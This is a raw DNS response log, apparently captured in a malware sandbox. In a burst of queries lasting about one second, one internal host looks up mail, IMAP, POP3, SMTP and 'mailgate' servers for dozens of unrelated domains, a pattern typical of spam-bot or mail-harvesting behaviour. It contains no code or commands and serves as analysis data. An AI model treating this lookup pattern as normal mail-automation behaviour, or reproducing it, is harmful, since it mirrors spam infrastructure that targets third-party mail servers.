Dec 22, 2023 21:15:06.525006056 CET	1.1.1.1	192.168.2.4	0xb152	Name error (3)	mail.firsteuropaglobal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.532529116 CET	1.1.1.1	192.168.2.4	0xc1c4	Name error (3)	mailgate.sitehalogen.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.532675982 CET	1.1.1.1	192.168.2.4	0x67ad	Name error (3)	caribbean360-com.p20.spamhero.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.535866022 CET	1.1.1.1	192.168.2.4	0x2946	Name error (3)	mail.bopclip.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.543319941 CET	1.1.1.1	192.168.2.4	0x81d6	Name error (3)	mail.mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.543441057 CET	1.1.1.1	192.168.2.4	0x81d6	Name error (3)	mail.mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.559125900 CET	1.1.1.1	192.168.2.4	0x8d4	Name error (3)	mail.acaiforcemaxweightloss.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.559197903 CET	1.1.1.1	192.168.2.4	0xe752	Name error (3)	mail.souriahost.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.574042082 CET	1.1.1.1	192.168.2.4	0xb152	Name error (3)	mail.firsteuropaglobal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.575445890 CET	1.1.1.1	192.168.2.4	0x2946	Name error (3)	mail.bopclip.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.584392071 CET	1.1.1.1	192.168.2.4	0xe3cc	Name error (3)	mail.ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.584439993 CET	1.1.1.1	192.168.2.4	0xe3cc	Name error (3)	mail.ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.588992119 CET	1.1.1.1	192.168.2.4	0x7205	Name error (3)	mail.excursionesmadryn.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.589183092 CET	1.1.1.1	192.168.2.4	0x7205	Name error (3)	mail.excursionesmadryn.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.589343071 CET	1.1.1.1	192.168.2.4	0x59e6	Name error (3)	imap.excursionesmadryn.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.589560986 CET	1.1.1.1	192.168.2.4	0x59e6	Name error (3)	imap.excursionesmadryn.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.644460917 CET	1.1.1.1	192.168.2.4	0x33ac	No error (0)	yandfcorp-com.mail.protection.outlook.com		104.47.66.10	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.644460917 CET	1.1.1.1	192.168.2.4	0x33ac	No error (0)	yandfcorp-com.mail.protection.outlook.com		104.47.59.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.680254936 CET	1.1.1.1	192.168.2.4	0x1d65	Name error (3)	smtp.srlbonfon9.com.hk	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.681107998 CET	1.1.1.1	192.168.2.4	0x6a84	No error (0)	bethanyhomesnc-com.mail.protection.outlook.com		104.47.66.10	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.681107998 CET	1.1.1.1	192.168.2.4	0x6a84	No error (0)	bethanyhomesnc-com.mail.protection.outlook.com		104.47.59.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.689511061 CET	1.1.1.1	192.168.2.4	0x9d0f	No error (0)	davescheirer-com.mail.protection.outlook.com		104.47.75.228	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.689511061 CET	1.1.1.1	192.168.2.4	0x9d0f	No error (0)	davescheirer-com.mail.protection.outlook.com		104.47.75.164	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.722230911 CET	1.1.1.1	192.168.2.4	0x33ac	No error (0)	yandfcorp-com.mail.protection.outlook.com		104.47.59.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.722230911 CET	1.1.1.1	192.168.2.4	0x33ac	No error (0)	yandfcorp-com.mail.protection.outlook.com		104.47.66.10	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.722914934 CET	1.1.1.1	192.168.2.4	0x6a84	No error (0)	bethanyhomesnc-com.mail.protection.outlook.com		104.47.59.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.722914934 CET	1.1.1.1	192.168.2.4	0x6a84	No error (0)	bethanyhomesnc-com.mail.protection.outlook.com		104.47.66.10	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.724894047 CET	1.1.1.1	192.168.2.4	0x4c4	No error (0)	racesystems-com-au.mail.protection.outlook.com		104.47.71.202	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.724894047 CET	1.1.1.1	192.168.2.4	0x4c4	No error (0)	racesystems-com-au.mail.protection.outlook.com		104.47.71.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.729547977 CET	1.1.1.1	192.168.2.4	0xf9be	No error (0)	lpl-org.mail.protection.outlook.com		104.47.59.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.729547977 CET	1.1.1.1	192.168.2.4	0xf9be	No error (0)	lpl-org.mail.protection.outlook.com		104.47.55.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.737390041 CET	1.1.1.1	192.168.2.4	0x9d0f	No error (0)	davescheirer-com.mail.protection.outlook.com		104.47.75.164	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.737390041 CET	1.1.1.1	192.168.2.4	0x9d0f	No error (0)	davescheirer-com.mail.protection.outlook.com		104.47.75.228	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.742830038 CET	1.1.1.1	192.168.2.4	0xdd6	Name error (3)	mailgate.gn.ais.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.746646881 CET	1.1.1.1	192.168.2.4	0xe1c8	Name error (3)	relay.freedhal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.776823997 CET	1.1.1.1	192.168.2.4	0xbfbd	No error (0)	covicol-com.mail.protection.outlook.com		104.47.17.74	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.776823997 CET	1.1.1.1	192.168.2.4	0xbfbd	No error (0)	covicol-com.mail.protection.outlook.com		104.47.17.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.785861015 CET	1.1.1.1	192.168.2.4	0xf9be	No error (0)	lpl-org.mail.protection.outlook.com		104.47.55.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.785861015 CET	1.1.1.1	192.168.2.4	0xf9be	No error (0)	lpl-org.mail.protection.outlook.com		104.47.59.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.785875082 CET	1.1.1.1	192.168.2.4	0xbfbd	No error (0)	covicol-com.mail.protection.outlook.com		104.47.17.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.785875082 CET	1.1.1.1	192.168.2.4	0xbfbd	No error (0)	covicol-com.mail.protection.outlook.com		104.47.17.74	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.785950899 CET	1.1.1.1	192.168.2.4	0x4c4	No error (0)	racesystems-com-au.mail.protection.outlook.com		104.47.71.202	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.785950899 CET	1.1.1.1	192.168.2.4	0x4c4	No error (0)	racesystems-com-au.mail.protection.outlook.com		104.47.71.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.829349995 CET	1.1.1.1	192.168.2.4	0xe1c8	Name error (3)	relay.freedhal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.833678007 CET	1.1.1.1	192.168.2.4	0xc3e2	Name error (3)	mailgate.srlbonfon9.com.hk	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.881298065 CET	1.1.1.1	192.168.2.4	0xc52a	Name error (3)	imap.vesond.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.882972002 CET	1.1.1.1	192.168.2.4	0xbcc2	Name error (3)	pop3.cominex.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.894853115 CET	1.1.1.1	192.168.2.4	0x5f41	Name error (3)	imap.acaiforcemaxweightloss.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.903712034 CET	1.1.1.1	192.168.2.4	0x81b5	Name error (3)	pop3.aurora-resorts.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.934192896 CET	1.1.1.1	192.168.2.4	0x31ee	Name error (3)	pop3.9a07f8a339ec2a3e.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.934767008 CET	1.1.1.1	192.168.2.4	0x1005	Name error (3)	relay.daystarbookscharity.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.937941074 CET	1.1.1.1	192.168.2.4	0x251f	Name error (3)	imap.firsteuropaglobal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.938013077 CET	1.1.1.1	192.168.2.4	0x5d11	Name error (3)	mail.hermanassociatesnewyork.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.938095093 CET	1.1.1.1	192.168.2.4	0x7d0a	Name error (3)	pop3.dm.famm.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.938412905 CET	1.1.1.1	192.168.2.4	0xd950	Name error (3)	imap.souriahost.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.939614058 CET	1.1.1.1	192.168.2.4	0x6c98	Name error (3)	imap.bilfinger.comqa	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.939723969 CET	1.1.1.1	192.168.2.4	0x7320	Name error (3)	imap.hoefakker.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.941719055 CET	1.1.1.1	192.168.2.4	0x6ca7	Name error (3)	pop3.select-feeds.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.943726063 CET	1.1.1.1	192.168.2.4	0xf2a2	Name error (3)	imap.studnets.ocps.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.953819990 CET	1.1.1.1	192.168.2.4	0x1183	Name error (3)	pop3.saskgmail.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.961906910 CET	1.1.1.1	192.168.2.4	0xd288	Name error (3)	pop3.dinfos.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.965663910 CET	1.1.1.1	192.168.2.4	0xdc74	Name error (3)	imap.sitehalogen.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.966082096 CET	1.1.1.1	192.168.2.4	0x398d	Name error (3)	imap.chemcaregroup.compg	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.967869997 CET	1.1.1.1	192.168.2.4	0xf618	Name error (3)	pop3.263host.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.967992067 CET	1.1.1.1	192.168.2.4	0xc37e	Name error (3)	imap.arbsdecq.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.968312979 CET	1.1.1.1	192.168.2.4	0x1ede	Name error (3)	mailgate.acaiforcemaxweightloss.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.969796896 CET	1.1.1.1	192.168.2.4	0xa1bc	Name error (3)	imap.piiyuw.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.970441103 CET	1.1.1.1	192.168.2.4	0x931c	Name error (3)	imap.rdhppx.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.971611977 CET	1.1.1.1	192.168.2.4	0xbf26	Name error (3)	pop3.enhancementsmast.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.972841024 CET	1.1.1.1	192.168.2.4	0x1a16	Name error (3)	pop3.sitehalogen.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.973495007 CET	1.1.1.1	192.168.2.4	0x37b1	Name error (3)	pop3.djmeca.com.ca	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.977701902 CET	1.1.1.1	192.168.2.4	0xdb5f	Name error (3)	imap.gn.ais.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.977741003 CET	1.1.1.1	192.168.2.4	0xbaee	Name error (3)	pop3.studnets.ocps.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.977781057 CET	1.1.1.1	192.168.2.4	0x740d	Name error (3)	imap.mercor.compl	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.980324984 CET	1.1.1.1	192.168.2.4	0x6a2c	Name error (3)	imap.djaskdas.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.981581926 CET	1.1.1.1	192.168.2.4	0x836	Name error (3)	mail.freedhal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.981811047 CET	1.1.1.1	192.168.2.4	0x6b3e	Name error (3)	pop3.mywitce.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.985873938 CET	1.1.1.1	192.168.2.4	0x6f84	Name error (3)	imap.saskgmail.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.989515066 CET	1.1.1.1	192.168.2.4	0x2d8e	Name error (3)	imap.dm.famm.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.993449926 CET	1.1.1.1	192.168.2.4	0x8804	Name error (3)	pop3.taylorbryant.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.998243093 CET	1.1.1.1	192.168.2.4	0xf8	Name error (3)	imap.djmeca.com.ca	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.998342991 CET	1.1.1.1	192.168.2.4	0xd2f2	Name error (3)	imap.hodginssmithconsulting.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:06.999706030 CET	1.1.1.1	192.168.2.4	0x8137	Name error (3)	imap.cominex.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.008748055 CET	1.1.1.1	192.168.2.4	0xaef	Name error (3)	pop3.firsteuropaglobal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.013854980 CET	1.1.1.1	192.168.2.4	0xa682	Server failure (2)	mail.distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.013895035 CET	1.1.1.1	192.168.2.4	0xa682	Server failure (2)	mail.distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.015697956 CET	1.1.1.1	192.168.2.4	0xe193	Server failure (2)	ssh.distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.015743971 CET	1.1.1.1	192.168.2.4	0xe193	Server failure (2)	ssh.distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.021469116 CET	1.1.1.1	192.168.2.4	0xdb35	Name error (3)	mailgate.chemcaregroup.compg	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.031059027 CET	1.1.1.1	192.168.2.4	0x985d	Name error (3)	imap.dresslermd.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.035420895 CET	1.1.1.1	192.168.2.4	0xb03a	Name error (3)	pop3.rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.035430908 CET	1.1.1.1	192.168.2.4	0xb03a	Name error (3)	pop3.rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.038649082 CET	1.1.1.1	192.168.2.4	0xe848	Name error (3)	imap.9a07f8a339ec2a3e.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.039360046 CET	1.1.1.1	192.168.2.4	0x9f9b	Name error (3)	mail.mobileuser.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.042517900 CET	1.1.1.1	192.168.2.4	0x914c	Name error (3)	imap.263host.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.059818029 CET	1.1.1.1	192.168.2.4	0x6fe4	Name error (3)	imap.154892628.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.062045097 CET	1.1.1.1	192.168.2.4	0x6fc9	Name error (3)	smtp.gn.ais.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.062632084 CET	1.1.1.1	192.168.2.4	0x74b1	Name error (3)	imap.asdfhjlasdfhjlk1.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.062648058 CET	1.1.1.1	192.168.2.4	0x6104	Name error (3)	imap.integral-tours.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.065753937 CET	1.1.1.1	192.168.2.4	0xdf5	Name error (3)	mail.nsorekek.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.065929890 CET	1.1.1.1	192.168.2.4	0xffe7	Name error (3)	imap.sodataol.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.067209959 CET	1.1.1.1	192.168.2.4	0xbda1	Name error (3)	imap.rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.071666956 CET	1.1.1.1	192.168.2.4	0xcdf9	Name error (3)	mailgate.piiyuw.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.097870111 CET	1.1.1.1	192.168.2.4	0x520a	Name error (3)	imap.enhancementsmast.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.099375010 CET	1.1.1.1	192.168.2.4	0x2d8e	Name error (3)	imap.dm.famm.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.099431992 CET	1.1.1.1	192.168.2.4	0x1a16	Name error (3)	pop3.sitehalogen.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.099761009 CET	1.1.1.1	192.168.2.4	0xbf26	Name error (3)	pop3.enhancementsmast.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.109646082 CET	1.1.1.1	192.168.2.4	0x30b6	Name error (3)	imap.mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.146039963 CET	1.1.1.1	192.168.2.4	0x30b6	Name error (3)	imap.mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.148932934 CET	1.1.1.1	192.168.2.4	0x4f3e	Name error (3)	mailgate.buyhits.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.148946047 CET	1.1.1.1	192.168.2.4	0x4f3e	Name error (3)	mailgate.buyhits.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.151343107 CET	1.1.1.1	192.168.2.4	0x985d	Name error (3)	imap.dresslermd.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.151441097 CET	1.1.1.1	192.168.2.4	0xaef	Name error (3)	pop3.firsteuropaglobal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.151673079 CET	1.1.1.1	192.168.2.4	0x914c	Name error (3)	imap.263host.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.151849985 CET	1.1.1.1	192.168.2.4	0x9f9b	Name error (3)	mail.mobileuser.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.156110048 CET	1.1.1.1	192.168.2.4	0x6fc9	Name error (3)	smtp.gn.ais.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.156121016 CET	1.1.1.1	192.168.2.4	0x6fe4	Name error (3)	imap.154892628.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.156368017 CET	1.1.1.1	192.168.2.4	0x6104	Name error (3)	imap.integral-tours.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.156488895 CET	1.1.1.1	192.168.2.4	0xe848	Name error (3)	imap.9a07f8a339ec2a3e.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.156665087 CET	1.1.1.1	192.168.2.4	0x74b1	Name error (3)	imap.asdfhjlasdfhjlk1.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.156759024 CET	1.1.1.1	192.168.2.4	0xdf5	Name error (3)	mail.nsorekek.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.162813902 CET	1.1.1.1	192.168.2.4	0x7756	Name error (3)	imap.aurora-resorts.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.169051886 CET	1.1.1.1	192.168.2.4	0xc055	Name error (3)	imap.taylorbryant.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.169063091 CET	1.1.1.1	192.168.2.4	0xc055	Name error (3)	imap.taylorbryant.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.226799011 CET	1.1.1.1	192.168.2.4	0x1d8c	Server failure (2)	pop.distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.226809978 CET	1.1.1.1	192.168.2.4	0x1d8c	Server failure (2)	pop.distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.240768909 CET	1.1.1.1	192.168.2.4	0xe110	Server failure (2)	distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.240782976 CET	1.1.1.1	192.168.2.4	0xe110	Server failure (2)	distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.356794119 CET	1.1.1.1	192.168.2.4	0x7756	Name error (3)	imap.aurora-resorts.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.356980085 CET	1.1.1.1	192.168.2.4	0xcdf9	Name error (3)	mailgate.piiyuw.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.357825994 CET	1.1.1.1	192.168.2.4	0x520a	Name error (3)	imap.enhancementsmast.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.391608000 CET	1.1.1.1	192.168.2.4	0xb50b	Name error (3)	relay.sitehalogen.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.475774050 CET	1.1.1.1	192.168.2.4	0x5723	Name error (3)	mailgate.nhclex.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.476907015 CET	1.1.1.1	192.168.2.4	0x755b	Name error (3)	mailgate.gpa.orgau	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.478629112 CET	1.1.1.1	192.168.2.4	0xf104	Name error (3)	smtp.154892628.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.507730961 CET	1.1.1.1	192.168.2.4	0xcec4	Name error (3)	mailgate.mywitce.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.633467913 CET	1.1.1.1	192.168.2.4	0x862f	Name error (3)	mailgate.dresslermd.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.824780941 CET	1.1.1.1	192.168.2.4	0x66b6	Name error (3)	mailgate.excursionesmadryn.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.831861019 CET	1.1.1.1	192.168.2.4	0x4ee5	Name error (3)	mailgate.154892628.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.831897020 CET	1.1.1.1	192.168.2.4	0xaba3	Name error (3)	mailgate.mercor.compl	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.832139015 CET	1.1.1.1	192.168.2.4	0x66b6	Name error (3)	mailgate.excursionesmadryn.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.839832067 CET	1.1.1.1	192.168.2.4	0x1950	Name error (3)	mailgate.aurora-resorts.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.856751919 CET	1.1.1.1	192.168.2.4	0x25ef	Name error (3)	mailgate.cominex.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.862963915 CET	1.1.1.1	192.168.2.4	0x9d42	Name error (3)	mailgate.arbsdecq.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.876955032 CET	1.1.1.1	192.168.2.4	0xb05c	Name error (3)	caribbean360-com.p40.spamhero.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.879220963 CET	1.1.1.1	192.168.2.4	0xb2f8	Name error (3)	mailgate.dm.famm.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.881454945 CET	1.1.1.1	192.168.2.4	0xc43	Name error (3)	mailgate.263host.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.882364035 CET	1.1.1.1	192.168.2.4	0xe538	Name error (3)	mailgate.dinfos.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.893445015 CET	1.1.1.1	192.168.2.4	0x34bb	Name error (3)	mailgate.djmeca.com.ca	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.894479036 CET	1.1.1.1	192.168.2.4	0x46c7	Name error (3)	mailgate.rio-perfume.orgua	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.896123886 CET	1.1.1.1	192.168.2.4	0xb39	Name error (3)	imap.earnmagabucks.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.896420002 CET	1.1.1.1	192.168.2.4	0x3b0e	Name error (3)	mailgate.souriahost.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.897104025 CET	1.1.1.1	192.168.2.4	0xe955	Name error (3)	mailgate.studnets.ocps.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.897715092 CET	1.1.1.1	192.168.2.4	0x4dd4	Name error (3)	mailgate.taylorbryant.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.903352976 CET	1.1.1.1	192.168.2.4	0xf7ea	Name error (3)	mailgate.9a07f8a339ec2a3e.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.907109022 CET	1.1.1.1	192.168.2.4	0x6e68	Name error (3)	mailgate.rdhppx.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.908016920 CET	1.1.1.1	192.168.2.4	0xe233	Name error (3)	mailgate.saskgmail.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.908282995 CET	1.1.1.1	192.168.2.4	0x343	Name error (3)	mailgate.firsteuropaglobal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.909344912 CET	1.1.1.1	192.168.2.4	0xb919	Name error (3)	mailgate.select-feeds.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.912058115 CET	1.1.1.1	192.168.2.4	0x6cd1	Name error (3)	mailgate.pkmanagment.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.914263010 CET	1.1.1.1	192.168.2.4	0x9a9c	Name error (3)	imap.91069b3d854a1035.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.918803930 CET	1.1.1.1	192.168.2.4	0x496d	Name error (3)	mailgate.sodataol.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.922631979 CET	1.1.1.1	192.168.2.4	0x6a9e	Name error (3)	imap.nsorekek.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.923485994 CET	1.1.1.1	192.168.2.4	0x701	Name error (3)	mailgate.enhancementsmast.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.924151897 CET	1.1.1.1	192.168.2.4	0x7f28	Name error (3)	mailgate.hodginssmithconsulting.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.927087069 CET	1.1.1.1	192.168.2.4	0xf06c	Name error (3)	mail.daystarbookscharity.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.929022074 CET	1.1.1.1	192.168.2.4	0x4bf4	Name error (3)	mailgate.earnmagabucks.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:07.978152990 CET	1.1.1.1	192.168.2.4	0xd5c9	Name error (3)	mailgate.jesusanswwers.com	none	none	A (IP address)	IN (0x0001)	false
